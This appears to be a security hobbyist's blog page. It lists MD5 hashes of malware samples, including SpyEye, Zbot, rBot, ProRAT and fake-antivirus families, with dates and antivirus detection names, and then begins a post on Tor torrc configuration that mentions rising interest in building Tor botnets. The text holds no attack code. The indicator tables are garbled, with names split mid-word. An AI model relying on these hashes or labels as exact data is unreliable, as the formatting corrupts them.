02084edaa51e7bd688fc95c0ae86a29a 2012-08-27 2011-11-18 19:01:09 2011-11-21 15:55:16 a variant of Win32/Injector.KTW Win32:Spyeye-ZI [Trj] Trojan-Spy.Win3 2.SpyEyes.qmg Trojan.Generic. KDV.399472 Trojan:Win32/Or sam!rts
022abced09dc8142069c88ce2ee06e55 2012-08-27 2012-06-22 23:18:26 2012-06-22 23:18:26 Win32/Spy.SpyEye.CA Win32:Zbot-NES [Trj] Net-Worm.Win32. Koobface.jcb Gen:Variant.Kaz y.25416
0234f794047645d090a47550cf229bd4 2012-08-27 2012-04-08 05:38:21 2012-06-13 10:50:56 probably a variant of Win32/Injector.KNA Win32:Malware-g en HEUR:Trojan.Win 32.Generic Gen:Trojan.Heur .VP2.eu0baiVzqp ii VirTool:Win32/V BInject.UG ASPack v2.12

 

—AVP  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
00ada89f87db0db0f3939271c34f865e 2012-08-27 2008-09-18 18:15:52 2009-04-27 12:34:23 probably a variant of Win32/Adware.RogueApp Win32:Adware-ge n not-a-virus:Fra udTool.Win32.Ag ent.r Adware.AntivirP rotection.A Program:Win32/A ntivirusProtect ion
0106605d11d29384522bfa17164fd943 2012-08-27 2012-03-22 10:32:32 2012-03-22 21:11:40 Win32:Dialer-AV P [Trj] Trojan.Win32.Di aler.qn Trojan.Mezzia.G en Trojan:Win32/Ad ialer.OP
014596c2ff3198b690bf2f3debcb0711 2012-08-27 2011-12-03 03:58:24 2011-12-05 21:04:13 Win32/Spy.Zbot.YW Win32:Trojan-ge n Trojan-Spy.Win3 2.Zbot.coxf Trojan.Spy.Zbot .ETB PWS:Win32/Zbot UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
01b37e56720a5bf5a85c103878100388 2012-08-27 2012-06-11 04:52:22 2012-06-11 04:52:22 Win32/Kryptik.AGSY Win32:Kryptik-I XH [Trj] Trojan-Spy.Win3 2.Zbot.dyuc Trojan.Agent.AV PE
01cd13a561ff5396604b8718e911b49f 2012-08-27 2011-11-17 13:29:53 2012-07-25 21:46:15 Win32:Trojan-ge n Trojan-Spy.Win3 2.Zbot.coxf Trojan.Spy.Zbot .ETB PWS:Win32/Zbot UPX UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
01f699ef8a648642084f7d665c3c265e 2012-08-27 2011-10-15 19:56:04 2011-10-25 08:10:00 Win32/Olmarik.AVP Win32:Alureon-A FI [Trj] HEUR:Trojan.Win 32.Generic Gen:Variant.Kaz y.27650 Trojan:Win32/Al ureon.DX
0267027dd9091a7054ff9c46384c6654 2012-08-27 2012-02-04 10:24:19 2012-03-31 17:43:08 a variant of Win32/Kryptik.YVK Win32:MalOb-JA [Cryp] Gen:Variant.Kaz y.52638 Rogue:Win32/Fak eRean
03ceb31131f1a47c1388e9c8a53feca0 2012-08-27 2010-08-10 20:27:10 2011-02-05 09:10:23 a variant of Win32/Injector.CLG Win32:Malware-g en Trojan-Download er.Win32.Banloa d.bekw Worm.Generic.27 2239 TrojanSpy:Win32 /Swisyn.B
05740edf8ef59dfdcb3660b35e76052c 2012-08-27 2010-06-02 22:16:22 2012-08-01 23:09:46 Win32:Rootkit-g en [Rtk] Trojan.Win32.Sw isyn.avpt Trojan.Generic. KD.14612 Trojan:Win32/Tr ufip!rts Armadillo v1.71
06daf98aa5504f124d1f19bb23d8aa2b 2012-08-27 2012-02-20 01:00:55 2012-02-20 01:00:55 a variant of Win32/Kryptik.YMJ Win32:MalOb-IG [Cryp] Trojan.Win32.Fa keAV.kbsd Gen:Variant.Kaz y.51804 Rogue:Win32/Fak eRean
07837d8689d093ddfb90e0e873a40403 2012-08-27 2012-02-06 12:01:38 2012-08-04 03:14:45 Win32:FakeAlert -EM [Trj] Trojan-FakeAV.W in32.VirusDocto r.v Gen:Variant.Urs nif.2 Rogue:Win32/Fak eVimes
07ca5974da6c583b74870b97ca4418ba 2012-08-27 2011-02-04 10:40:03 2012-05-10 04:07:38 a variant of Win32/Spy.VB.NJM Win32:VB-QXQ [Spy] Trojan.Win32.VB Krypt.bavp Gen:Trojan.Heur .fm0@s5JEYbfih Trojan:Win32/Bu mat!rts
087347abfd1f071bcbd9ed2cd83742c3 2012-08-27 2011-11-15 22:10:35 2011-12-16 17:26:10 a variant of Win32/Agent.TCI Win32:Crypt-KWZ [Trj] HEUR:Trojan.Win 32.Generic Gen:Variant.Buz y.4378 Trojan:Win32/In ject.AL
089204eee8ae33f0301b90c43c55aef4 2012-08-27 2011-11-15 12:43:41 2011-12-06 23:11:43 a variant of Win32/Kryptik.VPK Win32:Gbot-M [Trj] Trojan-FakeAV.W in32.OpenCloud. p Trojan.Generic. 6850089 Rogue:Win32/Fak eScanti
09ee083b59b68fa0807dde46be7938a4 2012-08-27 2011-03-19 05:31:23 2011-03-20 00:07:52 Win32/Sirefef.C Win32:Delf-OHT Trojan.Win32.Fa keAV.avpj Trojan.Generic. KD.138388 Worm:Win32/Sire fef.gen!A
0a58fdc81e8bb0e2be92c805846f082e 2012-08-27 2012-01-28 19:43:01 2012-01-28 19:43:01 a variant of Win32/Kryptik.ZAZ Win32:ZAccess-E F [Trj] HEUR:Trojan.Win 32.Generic Gen:Variant.Kaz y.53282 Rogue:Win32/Fak eRean
0aa08ce7021f950a13167728fe7386a6 2012-08-27 2012-03-24 13:06:08 2012-05-30 19:28:26 a variant of Win32/Injector.PLK Win32:Crypt-MCG [Trj] HEUR:Trojan.Win 32.Generic Trojan.Generic. 7394229 Worm:Win32/Nayr abot.gen!A
0b3daa6dcf816fa34179197d6be16c21 2012-08-27 2012-01-17 00:16:22 2012-02-01 14:32:17 a variant of Win32/Kryptik.ZAZ Win32:ZAccess-E F [Trj] Trojan.Win32.Fa keAV.kmpm Gen:Variant.Kaz y.53282 Rogue:Win32/Fak eRean
0ce67f90dd1a936cbc08a6dea0e4d8ae 2012-08-27 2011-11-17 02:06:29 2012-02-09 06:37:16 a variant of Win32/Agent.TCI Win32:Crypt-KWZ [Trj] HEUR:Trojan.Win 32.Generic Gen:Variant.Buz y.4378 Trojan:Win32/In ject.AL
0cf1f914d2805a4cafa33ba9088424a2 2012-08-27 2012-01-17 13:30:31 2012-01-17 13:30:31 a variant of Win32/Kryptik.YWV Win32:Downloade r-MHD [Trj] Trojan.Win32.Fa keAV.kjsd Gen:Variant.Gra ftor.12856 Rogue:Win32/Fak eRean

 

—EICAR  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
14eb13beba07c82ba1851bce503cb034 2012-08-27 2011-09-06 11:15:30 2011-12-17 19:44:11 Eicar test file EICAR Test-NOT virus!!! EICAR-Test-File EICAR-Test-File (not a virus) Virus:DOS/EICAR _Test_File
16f8c3d67250837bc2e400ad19e0b72a 2012-08-27 2012-08-10 18:19:02 2012-08-15 16:50:23 BV:BVCK-gen3 P2P-Worm.BAT.Co pybat.ag UPX, PKLITE
2c64f48e5135fbaa944172202d236c7d 2012-08-27 2006-06-01 07:00:05 2012-08-20 00:47:44 EICAR Test-NOT virus!!! EICAR-Test-File EICAR-Test-File (not a virus) Virus:DOS/EICAR _Test_File
317c6356b04926b4cf107df145289435 2012-08-27 2010-12-14 12:22:14 2012-08-12 02:15:31 AntiAVP-Avbad [Trj] Trojan.DOS.Avba d Trojan.Avbad.A Trojan:DOS/Avba d LZEXE, PKLITE
5c770e1490835247d0a541474ee51c50 2012-08-27 2012-07-26 12:10:50 2012-07-27 20:06:32 EICAR Test-NOT virus!!! EICAR-Test-File
5e67103aa3baadde488fc8a66915610e 2012-08-27 2012-02-07 23:35:55 2012-04-07 06:45:15 EICAR-Test-File Virus:DOS/EICAR _Test_File
613a4ae52be7190a18c340f0ffa78fbd 2012-08-27 2012-07-21 14:15:28 2012-07-24 20:16:28 EICAR Test-NOT virus!!! EICAR-Test-File
67cafd0c5fb22dc93815700230d368c3 2012-08-27 2012-07-26 12:19:57 2012-07-27 20:06:19 EICAR Test-NOT virus!!! EICAR-Test-File
72015abc47f25b8f624a0b1b2eb3ebe0 2012-08-27 2012-01-30 00:23:27 2012-04-18 14:37:09 EICAR Test-NOT virus!!! HEUR:Trojan.Win 32.Generic Trojan.Generic. 7358064 Virus:DOS/EICAR _Test_File
79449529d738e9a3ef5893efaf048da5 2012-08-27 2012-07-26 12:27:02 2012-07-27 20:05:41 EICAR Test-NOT virus!!! EICAR-Test-File
82a83e6e1799f3886123614014ef07f4 2012-08-27 2012-07-21 15:02:40 2012-07-24 19:45:51 EICAR Test-NOT virus!!! EICAR-Test-File
934162a08d4a38711083345ef0b57d14 2012-08-27 2008-03-22 05:39:27 2012-05-16 01:40:33 EICAR-Test-File Virus:DOS/EICAR _Test_File
9590348417ce24e4c1d0e1d8af4c4939 2012-08-27 2012-08-04 04:10:00 2012-08-09 00:43:00 EICAR Test-NOT virus!!! EICAR-Test-File Virus:BAT/Mouse Disable.D
96cb4955ea6bab5f3c8524528401413c 2012-08-27 2009-11-30 16:14:16 2011-09-07 03:48:37 probably a variant of Win32/Agent.XRUNPA Win32:Malware-g en Trojan.Win32.Ge nome.qcad Trojan.Generic. 3199186 Trojan:Win32/Me redrop
a27ee916c22a51179c9e2f1ae67aa7eb 2012-08-27 2012-07-21 16:02:15 2012-07-24 19:45:21 EICAR Test-NOT virus!!! EICAR-Test-File
a911a87a26153abe77c3b25c28615218 2012-08-27 2010-09-02 12:41:52 2010-09-02 23:44:58 Win32:Malware-g en Trojan.Win32.Co smu.dry Dropped:EICAR-T est-File (not a virus)
ac2ff734c993884834c5bb820d21f3f1 2012-08-27 2011-11-19 09:10:49 2012-07-30 18:46:08 EICAR Test-NOT virus!!! EICAR-Test-File
b07e6f95ddf91415897164d7b3eb4736 2012-08-27 2011-10-05 23:16:00 2011-10-05 23:16:00 Trojan.Script.7 133
c29bc4713727d469886ea655115dd177 2012-08-27 2012-08-04 04:28:58 2012-08-08 21:33:18 BV:Malware-gen IRC-Worm.BAT.Ge neric Trojan.Batzz99. A Virus:BAT/Adiou s.A embedded
c9357c00c4da9e9fd8add93e917c57c6 2012-08-27 2012-07-21 17:35:39 2012-07-26 20:06:19 EICAR Test-NOT virus!!!

 

 

—mistfall  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
31484725213be800bc1d69cb0ece77aa 2012-08-27 2012-08-10 18:00:33 2012-08-13 13:48:27 Win32:Mistfall [Tool] VirTool.Win32.M istfall VirTool:Win32/M istfall
50e4913a0d73f61279101d08a6e983a5 1970-01-01 2006-06-11 16:14:34 2012-04-15 22:14:43 Win32/VirTool.Mistfall Win32:Mistfall [Tool] VirTool.Win32.M istfall VirTool:Win32/M istfall

 

 

 

 

 

—rBot =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
2af4783aba321f53082085e8937b2567 2012-08-28 2012-07-11 23:52:26 2012-08-26 04:26:41 Win32:Virtob Backdoor.Win32. Rbot.adqd Trojan.Generic. 5333379 Virus:Win32/Vir ut.AC
865915650a85e7c27cdd11850a13f86e 2012-08-28 2006-09-03 07:01:30 2012-06-17 17:26:56 Win32/Rbot Win32:Rbot-GKN [Trj] Net-Worm.Win32. Kolab.aefe IRC-Worm.Generi c.22084 Backdoor:Win32/ Rbot
00157f6de1c95255bb781e45088d9a21 2012-08-27 2012-06-24 18:13:49 2012-06-24 18:13:49 Win32/Rbot.YM Trojan.Win32.Ge nome.dnsq IRC-Worm.Generi c.15028 Backdoor:Win32/ Rbot
0024542e9282e2fe0c0ca9b0c0b6f43a 2012-08-27 2012-02-18 10:11:27 2012-04-16 16:12:13 Win32/Virut.NBP Win32:Rbot-GQG [Trj] Backdoor.Win32. LolBot.xzd Worm.Generic.29 8540 Trojan:Win32/Fa kefolder.B
002984263e0d36042f0a4e613f9b9b46 2012-08-27 2009-02-24 07:24:34 2009-02-24 07:24:34 probably a variant of Win32/Rbot Win32:Trojan-ge n {Other} Backdoor.Win32. Rbot.fat Backdoor.Bot.17 676 ASProtect v1.23 RC1
002d88dc3184ac1cc52018a4a34d02c4 2012-08-27 2011-09-15 04:06:24 2011-09-15 04:06:24 a variant of Win32/Injector.IIQ Win32:Sality Worm.Win32.Ngrb ot.cnh Trojan.Generic. KDV.304762 Worm:Win32/Dork bot.gen!A Armadillo v1.71
00423373be53630ab1ceea85fa574939 2012-08-27 2011-04-02 04:52:43 2012-08-17 14:22:42 Trojan.Generic. 6907346 Backdoor:Win32/ Rbot.gen!G
00492917b6eb3d9c6d62f86f9acc6bce 2012-08-27 2012-06-25 00:19:05 2012-06-25 00:19:05 Backdoor.Win32. Rbot.umw Backdoor.Bot.60 974 Dev-C++ 4.9.9.2 -> Bloodshed Software
0052a28dc60cac68b54ddf8f02d5aa5d 2012-08-27 2010-07-18 23:41:47 2010-07-18 23:41:47 a variant of Win32/Packed.Themida Gen:Trojan.Heur .RqX@5Gy!Zup Backdoor:Win32/ Bifrose.gen!C
0066ad4c5a1206fb6563a285f2ce14a0 2012-08-27 2012-06-22 19:57:07 2012-06-22 19:57:07 a variant of Win32/Packed.Themida Backdoor.Win32. Rbot.akio Trojan.Generic. 7352279 Themida
006e7190f10953306ba5846d272af457 2012-08-27 2011-03-13 17:31:06 2012-02-11 09:09:57 probably a variant of Win32/Agent.COLWWTQ Win32:Spyware-g en [Spy] Backdoor.Win32. Rbot.alyk Gen:Trojan.Heur .GM.0140430082 Backdoor:Win32/ Ursap!rts
006f203bee46359995b68b8f0f95dea1 2012-08-27 2011-12-03 11:22:06 2012-02-11 09:20:43 Win32/TrojanDropper.Delf.NJH Win32:Bifrose-D YN [Trj] Backdoor.Win32. Rbot.hyj Trojan.Keylogge r.ADY TrojanDropper:W in32/Agent.BAD
008e7e1d54316b2f2e6aebd0861a37fe 2012-08-27 2012-06-24 02:14:52 2012-06-24 02:14:52 a variant of Win32/Rbot Win32:EggDrop-A C [Trj] Backdoor.Win32. Rbot.boz Backdoor.Rbot.E UT Backdoor:Win32/ Rbot.gen!F
00a649781cf7d8153bd9af03d0ce5cd9 2012-08-27 2012-06-25 01:54:32 2012-06-25 01:54:32 a variant of Win32/Injector.OI Win32:Rbot-GLC [Trj] Trojan.Win32.Bu zus.bnsz Trojan.Generic. 1809892 VirTool:Win32/I njector.gen!B Armadillo v1.71
00ad7e4470086e1345b017876fd41619 2012-08-27 2011-09-11 16:46:41 2011-11-14 20:47:48 a variant of Win32/Packed.MoleboxUltra Win32:Malware-g en Backdoor.Win32. Rbot.hyj Trojan.Generic. 4200368 TrojanDropper:W in32/Agent.BAD
00d753fcbad0dc47101d3818d491a7e7 2012-08-27 2012-06-21 13:36:05 2012-06-21 13:36:05 Win32/TrojanDownloader.Agent.OST Win32:Trojan-ge n not-a-virus:AdW are.Win32.ZenoS earch.ky Trojan.Generic. 1385769 Trojan:Win32/Vu ndo
00e9816f69922b9c43f89dc0a92a99d1 2012-08-27 2008-12-27 13:34:07 2010-01-22 01:10:12 Backdoor.Bot.89 803 Xtreme-Protecto r v1.05
00eee20b71e92f57ded4b497e5dbdaf1 2012-08-27 2008-05-05 22:13:17 2008-05-05 22:13:17 Win32:Small-BHA Backdoor.Prorat .C Armadillo v1.71
00fc84692d5b22e4ecb3d8022ea86698 2012-08-27 2012-06-27 09:22:01 2012-06-27 09:22:01 a variant of Win32/Spy.Delf.NLM Win32:Agent-ACQ U [Trj] Backdoor.Win32. Rbot.agyp Gen:Trojan.Heur .PT.ei4abKk10V Trojan:Win32/De lf.EZ Malware_Prot.AJ themida 1.0.0.5 -> http://www.orea ns.com
00fc850b10d54e404cc1ff521ad10ea6 2012-08-27 2008-04-28 16:59:58 2008-05-06 12:24:21 Xtreme-Protecto r v1.05
Checked on VT at 2012-09-10 12:39:43
Scanned at 2012-08-26 04:26:41
Fi

 

—proRAT  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
0023b2d76c606328688afa5ade9c0acf 2012-08-27 2009-10-25 02:21:28 2009-10-25 02:21:28 a variant of Win32/Packed.Themida Win32:Bifrose-D RI Gen:Trojan.Heur .dvXarDpNMyoi Backdoor:Win32/ Prorat.AH
0043b0517c628ef897f477e4345fd7a3 2012-08-27 2010-07-02 02:34:55 2012-02-11 12:45:38 a variant of Win32/Packed.Themida Win32:Malware-g en Backdoor.Win32. Prorat.uft Backdoor:Win32/ Ursap!rts
0054c6b833c013f32bced841e1e6739d 2012-08-27 2009-10-19 17:19:55 2009-10-19 17:19:55 probably unknown NewHeur_PE Win32:Trojan-ge n MemScan:Backdoo r.Agent.ZNH Backdoor:Win32/ Prorat.AM
0073d646cf945a4b5b3ba513b87a3c60 2012-08-27 2012-06-20 00:16:55 2012-06-20 00:16:55 a variant of Win32/Prorat.19.NAC Win32:Malware-g en Backdoor.Win32. Prorat.efu MemScan:Backdoo r.Delf.HBZ Backdoor:Win32/ Prorat.AM Obsidium V1.3.0.4 -> Obsidium Software
008e37fd9125255f6a25e19fc7640bea 2012-08-27 2012-06-05 10:42:20 2012-06-05 10:42:20 Win32:Spyware-g en [Spy] Backdoor.Win32. Prorat.het Trojan.Generic. 4484805
0090c0275880256778d156f7b08e8f03 2012-08-27 2011-03-15 10:52:42 2011-04-13 18:37:22 Backdoor.Win32. Prorat.rft Gen:Trojan.Heur .dr3a4ScZqsdi
00a490a8595793e54caa7e9a38768891 2012-08-27 2008-10-01 16:13:23 2008-10-01 16:13:23 probably unknown NewHeur_PE Win32:Agent-ONW MemScan:Backdoo r.Agent.ZNH ASProtect v1.23 RC1
00eee20b71e92f57ded4b497e5dbdaf1 2012-08-27 2008-05-05 22:13:17 2008-05-05 22:13:17 Win32:Small-BHA Backdoor.Prorat .C Armadillo v1.71
00fc839a3e3d2986cceca58ae900ce13 2012-08-27 2010-08-18 21:00:24 2010-08-24 10:54:38 Win32/Packed.Themida.A Win32:Malware-g en Backdoor.Win32. Prorat.19.dht Trojan.Packed.L ibix.Gen.2 VirTool:Win32/O bfuscator.XX
0100ca070eda3acfbdfbf2424612cc5f 2012-08-27 2010-12-14 03:58:20 2012-06-07 07:22:17 a variant of Win32/Injector.BLB Win32:VB-PJN [Drp] Backdoor.Win32. Prorat.hhw Backdoor.Generi c.319260 Trojan:Win32/VB Inject.E
0121a89cb657a11e5dd092883bfd7825 2012-08-27 2010-07-17 07:37:48 2010-07-17 07:37:48 a variant of Win32/TrojanDropper.Delf.NFK Win32:Prorat-JE Gen:Trojan.Heur .GM.0408470024
017d509b8598921ed40744e0ca829db6 2012-08-27 2009-06-22 12:28:25 2009-06-22 12:28:25 Win32:Trojan-ge n {Other} Gen:Trojan.Heur .VB.1025DA9A9A Trojan:Win32/Ma lat
01e7cbd34f8bd3cf5fa608baf2fa6d60 2012-08-27 2011-11-15 13:23:32 2012-02-12 07:10:28 Win32/Prorat.NAH Win32:Prorat-FE [Trj] Backdoor.Win32. Prorat.dz Backdoor.Generi c.21020 Backdoor:Win32/ Prorat.K
01e93b84d7df6bac7cde630ffffd043f 2012-08-27 2010-05-20 13:53:52 2012-06-09 12:47:16 a variant of Win32/RemoteAnything.AA Win32:Trojan-ge n Backdoor.Win32. Prorat.hoj Packer.Malware. NSAnti.1 Backdoor:Win32/ VB.OF
01ea64f575a9f95563ffeef45fb09ca2 2012-08-27 2012-06-27 09:46:59 2012-06-27 09:46:59 Win32/Prorat.19 Win32:Prorat-BH [Trj] Backdoor.Win32. Prorat.kcm Backdoor.Prorat .19.I Backdoor:Win32/ Prorat.Z ASPack v2.12
02119a21b4b339dd367769c2aebd622c 2012-08-27 2008-11-04 18:23:06 2009-12-05 01:59:16 probably a variant of Win32/Agent Win32:Trojan-ge n Backdoor.Win32. ProRat.cqf Trojan.Generic. 1859606
022cb4ec9e03596701cdc5252c09d0e9 2012-08-27 2012-06-25 18:49:03 2012-06-25 18:49:03 a variant of Win32/Injector.EJM Win32:Trojan-ge n Backdoor.Win32. Prorat.efy Gen:Trojan.Heur .Dropper.bm0@aa gNUVni VirTool:Win32/V BInject.AZ
0247d8561b2a3b8338aa2eff5632f212 2012-08-27 2009-10-13 11:06:04 2009-11-08 22:05:55 Win32:Prorat-IR Backdoor.Win32. ProRat.fns MemScan:Backdoo r.Agent.ZNH Backdoor:Win32/ Prorat
0248b3729a47c970cbd5c43e7298d3dc 2012-08-27 2012-06-21 15:25:52 2012-06-21 15:25:52 a variant of Win32/GameHack.AL Win32:Trojan-ge n Backdoor.Win32. Prorat.fwr Backdoor.Turkoj an.AF Backdoor:Win32/ Turkojan.AI
024c8882871ba3921c2f243ad96e3956 2012-08-27 2012-06-19 17:50:01 2012-06-19 17:50:01 probably a variant of Win32/Agent.LTWPXFW Win32:Trojan-ge n Backdoor.Win32. Prorat.evo MemScan:Backdoo r.ProRat.TG Backdoor:Win32/ Prorat.U

—lostDoor – proRAT kinda  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
cb5c84f6f7e682d9cba2ecba677336c4 1970-01-01 2010-12-04 10:25:27 2012-04-04 22:06:55 a variant of Win32/Spy.KeyLogger.NHM Win32:Agent-ABM I [Trj] Trojan-Spy.Win3 2.VBChuchelo.ah Trojan.Generic. 161562 TrojanSpy:Win32 /Choochie.K

 

 

—Ultimate_Spy-Net  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
0058368c1856f88556e881d203441805 2012-08-27 2012-06-24 11:10:36 2012-06-24 11:10:36 a variant of Win32/TrojanDownloader.FakeAlert.NQ Win32:Lighty-B [Cryp] Trojan.Win32.Vi lsel.mfb Packer.Malware. Lighty.I TrojanDownloade r:Win32/Renos
00adc990cbf1e4733fdf3afbdf54938a 2012-08-27 2012-06-23 11:17:18 2012-06-23 11:17:18 a variant of Win32/TrojanDownloader.FakeAlert.NQ Win32:Lighty-B [Cryp] Backdoor.Win32. UltimateDefende r.hiw Packer.Malware. Lighty.I Trojan:Win32/Wa ntvi.I
00c547fb1918bcef0a864161b33f0ead 2012-08-27 2010-12-30 22:38:00 2012-02-11 06:34:55 a variant of Win32/Adware.Antivirus2008 Win32:FakeAV-M [Trj] Trojan-FakeAV.W in32.UltimateAn tivirus.g Trojan.Generic. 365345 Rogue:Win32/Fak eSecSen ASPack v2.12
00cbcdff13e5c710341393a19d260da6 2012-08-27 2008-07-28 12:42:05 2009-10-16 10:45:20 probably a variant of Win32/Adware.Antivirus2008 Win32:Trojan-ge n not-a-virus:Fra udTool.Win32.Ul timateAntivirus .ag Trojan.Generic. 669380 Trojan:Win32/Fa keSecSen ASProtect v1.23 RC1
0279f3e2593cb0130e2616de1e4ebb76 2012-08-27 2008-06-18 11:50:19 2012-02-12 23:45:25 Win32/Adware.WinAntiVirus Win32:FakeAV-M [Trj] Trojan-FakeAV.W in32.UltimateAn tivirus.cl Adware.Rogue.Ad vancedAntivirus .A Rogue:Win32/Fak eSecSen Armadillo v1.xx – v2.xx
029eea83722c549f099d423418b8a54a 2012-08-27 2008-10-17 23:58:48 2011-02-26 10:22:25 a variant of Win32/TrojanDownloader.FakeAlert.NQ Win32:Lighty-B Trojan-Dropper. Win32.Wlord.ahu Packer.Malware. Lighty.I TrojanDropper:W in32/Rooter.B
0305fbcff971eabd81d5ddadd29e6ec1 2012-08-27 2008-08-22 16:42:43 2011-07-18 05:11:41 probably a variant of Win32/Adware.Antivirus2008 Win32:Neptunia- AGB [Trj] not-a-virus:Fra udTool.Win32.Ul timateAntivirus .bi Trojan.Fakeav.B C Rogue:Win32/Fak eSecSen ASPack v2.12
0358ecdc802150626cec39052e43132b 2012-08-27 2008-11-03 08:08:58 2011-08-26 21:27:41 Win32/TrojanDownloader.FakeAlert.PL.Gen Win32:Lighty-D [Cryp] Backdoor.Win32. UltimateDefende r.gsv Trojan.FakeAler t.ANE TrojanDownloade r:Win32/Renos.F J
0452ca3a273127a940c491a87806b047 2012-08-27 2008-08-28 06:23:10 2008-10-22 05:12:57 not-a-virus:Fra udTool.Win32.Ul timateAntivirus .bu Program:Win32/A ntivirus2008 ASPack v2.12
057abdd8f6d1f61eef9434b5e7daa4c6 2012-08-27 2011-07-27 19:30:35 2011-10-20 22:26:38 Win32/Adware.UltimateDefender Win32:FraudTool -GY [Tool] Backdoor.Win32. UltimateDefende r.pq Trojan.Generic. 6410781 Trojan:Win32/An omaly.gen!A UPX UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
06fbf01caa783f46421a0bbedf97719e 2012-08-27 2012-06-19 23:11:45 2012-06-19 23:11:45 probably a variant of Win32/Kryptik.FD Win32:Lighty-E [Cryp] Backdoor.Win32. UltimateDefende r.hwp Trojan.FakeAler t.ANE Trojan:Win32/Wa ntvi.I
08226ab7f48461cb78d33b985ec2fa4f 2012-08-27 2008-08-25 12:55:04 2009-05-01 22:36:49 Win32/Adware.Antivirus2008 Win32:Neptunia- AGB not-a-virus:Fra udTool.Win32.Ul timateAntivirus .bq Trojan.Fakealer t.ALL Trojan:Win32/Fa keSecSen ASPack v2.12
085381cd16ef4f9c6cf03ce79f77b35f 2012-08-27 2009-04-16 21:00:47 2009-04-16 21:00:47 probably a variant of Win32/Adware.Antivirus2008 Win32:Neptunia- AGB not-a-virus:Fra udTool.Win32.Ul timateAntivirus .by Trojan.Fakeav.B C Trojan:Win32/Fa keSecSen ASPack v2.12
09cb0a224418027c40f9552c56180750 2012-08-27 2008-12-02 10:46:37 2009-09-12 07:57:49 a variant of Win32/Kryptik.CH Win32:Lighty-H Backdoor.Win32. UltimateDefende r.hki Trojan.Generic. 1730997 TrojanDownloade r:Win32/Renos.F J
0b55b43d8ec5898f408707ac069300b6 2012-08-27 2008-07-10 12:31:24 2011-08-15 04:38:12 Win32/Adware.Antivirus2008 Win32:FakeAlert -S [Trj] Trojan-FakeAV.W in32.UltimateAn tivirus.dp Trojan.FakeAv.B U Rogue:Win32/Fak eSecSen ASProtect v1.23 RC1
0c243bffc29aab2ea6e4abb65319f33c 2012-08-27 2008-09-19 14:03:15 2012-02-09 08:34:42 Win32/Adware.Antivirus2008 Win32:Neptunia- AGB [Trj] Trojan-FakeAV.W in32.UltimateAn tivirus.cp Trojan.Fakeav.B C Rogue:Win32/Fak eSecSen ASPack v2.12
0e4eaff4a610c160e9cfbe4b01463295 2012-08-27 2009-07-21 00:34:56 2009-11-15 11:49:01 probably a variant of Win32/UltimateDefender.A Win32:Agent-QNI Backdoor.Win32. UltimateDefende r.ieq Generic.Malware .P!.6473D4B8 VirTool:WinNT/X antvi.gen!A
0f27d07f89550dcae7050f3c100137f3 2012-08-27 2008-03-29 22:49:29 2008-10-29 15:07:04 not-a-virus:Fra udTool.Win32.Ul timateDefender. cm Trojan.Crypt.AN Trojan:Win32/Ti bs.gen!H
0f388783e9960156399c343ea7a70e24 2012-08-27 2008-11-03 20:53:28 2009-05-26 21:41:40 Win32/TrojanDownloader.FakeAlert.PL.Gen Win32:Lighty-D Backdoor.Win32. UltimateDefende r.gky Trojan.FakeAler t.ANE TrojanClicker:W in32/Klik
102009d4b848bd264753f877dae939a4 2012-08-27 2008-08-27 07:34:09 2012-01-24 08:11:37 probably a variant of Win32/Adware.Antivirus2008 Win32:Neptunia- AGB [Trj] Trojan-FakeAV.W in32.UltimateAn tivirus.bw Trojan.Fakeav.B C Rogue:Win32/Fak eSecSen ASPack v2.12

 

 

09/17/12

Tor setup- torrc file configuration

gAtO bEen- working on Tor stuff and wanted to find the right torrc commands and configuration for Tor. So I started to look around and found these files. I guess if we look at these we could come up with maybe all the configurations keywords for Tor. gAtO is working on Tor and maybe some bot’s woking in Tor-land. The word is out and many are working on Tor botnets the good thing is most all are beginners, but the interest of people not wanting to rent a bot but build a bot is getting stronger. People wanting to learn code. Script kiddies with code this is not going to be pretty folks – hope you enjoy the torrc stuff- gAtO oUt

File 1

## Configuration file for a typical Tor user

## Last updated 17 September 2012 @gAtOmAlO2 .

## (May or may not work for much older or much newer versions of Tor.)

##

## Lines that begin with “## ” try to explain what’s going on. Lines

## that begin with just “#” are disabled commands: you can enable them

## by removing the “#” symbol.

##

## See the man page, or https://svn.torproject.org/svn/tor/tags/tor-0_0_9_5/src/config/torrc.sample.in ,

## for more options you can use in this file.

##

## Tor will look for this file in various places based on your platform:

## http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#torrc

## Replace this with “SocksPort 0″ if you plan to run Tor only as a

## server, and not make any local application connections yourself.

SocksPort 9050 # what port to open for local application connections

SocksListenAddress 127.0.0.1 # accept connections only from localhost

#SocksListenAddress 192.168.0.1:9100 # listen on this IP:port also

 

## Entry policies to allow/deny SOCKS requests based on IP address.

